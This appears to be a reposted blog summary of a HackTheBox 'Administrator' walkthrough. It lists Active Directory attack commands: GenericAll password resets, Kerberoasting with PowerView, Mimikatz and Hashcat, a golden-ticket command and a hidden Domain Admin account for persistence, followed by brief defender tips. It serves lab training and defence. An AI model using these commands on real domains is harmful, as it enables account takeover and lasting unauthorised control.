HackTheBox Administrator: Assumed Breach & Active Directory Exploitation

By /

Listen to this Post

HackTheBox Administrator video is now up! This is an assumed breach box, meaning we started out with credentials. The path is primarily Active Directory (AD), taking advantage of GenericAll to set a password and GenericWrite to set an account up for Kerberoasting: Watch the Video.

You Should Know:

1. Exploiting GenericAll in Active Directory

The GenericAll privilege grants full control over an object, allowing attackers to reset passwords or modify attributes. Below are key commands to abuse this:

  • PowerShell (Using ActiveDirectory Module):
    Check for GenericAll privileges on a user/computer 
Get-ADUser -Identity TargetUser -Properties  | Select-Object DistinguishedName, ObjectClass 
Get-ACL "AD:\$(Get-ADUser TargetUser)" | Select-Object -ExpandProperty Access

Reset user password (if GenericAll is granted) 
Set-ADAccountPassword -Identity TargetUser -NewPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)

  • Using PowerView (Offensive PowerShell):

    Find objects where the current user has GenericAll 
Find-InterestingDomainAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "GenericAll" }

Force password change 
Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString "HackTheBox!" -AsPlainText -Force)

2. Abusing GenericWrite for Kerberoasting

GenericWrite allows modifying attributes, which can be weaponized for Kerberoasting (extracting service account hashes).

  • Extracting Service Principal Names (SPNs) for Kerberoasting:
    Using PowerView 
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

Requesting TGS tickets for offline cracking 
Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dc01.htb.local"

  • Exporting Tickets with Mimikatz (Windows):

    mimikatz.exe "kerberos::list /export"

  • Cracking with Hashcat (Linux):

    hashcat -m 13100 kerberoast_hashes.txt rockyou.txt -O -w 4

3. Post-Exploitation: Maintaining Access

After compromising an account, ensure persistence:

  • Golden Ticket Attack (Mimikatz):

    mimikatz.exe "kerberos::golden /user:Administrator /domain:htb.local /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt"

  • Creating a Hidden User (Windows):

    net user eviladmin P@ssw0rd123 /add /domain 
net group "Domain Admins" eviladmin /add /domain

What Undercode Say:

This HackTheBox challenge demonstrates real-world AD exploitation techniques. Key takeaways:
– GenericAll and GenericWrite are dangerous permissions that should be audited.
– Kerberoasting remains a prevalent attack vector in AD environments.
– Always monitor SPN changes and unusual ticket requests in logs.

For defenders:

  • Restrict PowerShell remoting (Disable-WSManCredSSP).
  • Enable Kerberos logging (Audit Kerberos Service Ticket Operations).
  • Use LAPS (Local Administrator Password Solution) to mitigate lateral movement.

Expected Output:

A compromised AD environment where an attacker leverages GenericAll for password reset and GenericWrite for Kerberoasting, leading to domain escalation.

(End of )

References:

Reported By: Ippsec Hackthebox – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: